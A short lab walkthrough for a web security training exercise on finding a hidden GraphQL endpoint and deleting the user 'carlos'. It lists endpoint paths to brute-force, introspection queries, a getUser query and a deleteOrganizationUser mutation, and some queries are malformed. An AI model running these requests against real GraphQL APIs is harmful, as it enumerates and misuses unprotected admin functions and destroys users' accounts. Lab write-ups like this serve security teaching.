Lab: Finding a hidden GraphQL endpoint

The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking pages in the site. The endpoint also has some defenses against introspection.

To solve the lab, find the hidden endpoint and delete carlos.

Steps

Open Burp Suite and visit the target website
Click on any get request and send it to the intruder and repeater
Brute force the path using the below list

/graphql
/api
/api/graphql
/graphql/api
/graphql/graphql

In the repeater add the /api endpoint with a query

GET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D

Switch to the GraphQL tab in repeater
Get all the available queryType

query{__schema

{queryType{fields{name description}}}

}

Get the available mutation type

query{__schema

{mutationType{fields{name description}}}

}

Get the user Carlos ID

query{__schema

{queryType{fields{name description}}}

getUser(id:3)
{
	id
	username
}
}

Delete the user carlos using the mutation type

mutation{

	deleteOrganizationUser(input:{id:3})
	{
		user {id}
	}
}

Congrats! You have solved the lab

Note: To do this you have to URL encode and the requests.

PreviousBypassing GraphQL introspection defenses NextBypassing rate limiting using aliases

Last updated 1 year ago

hashtagSteps

Steps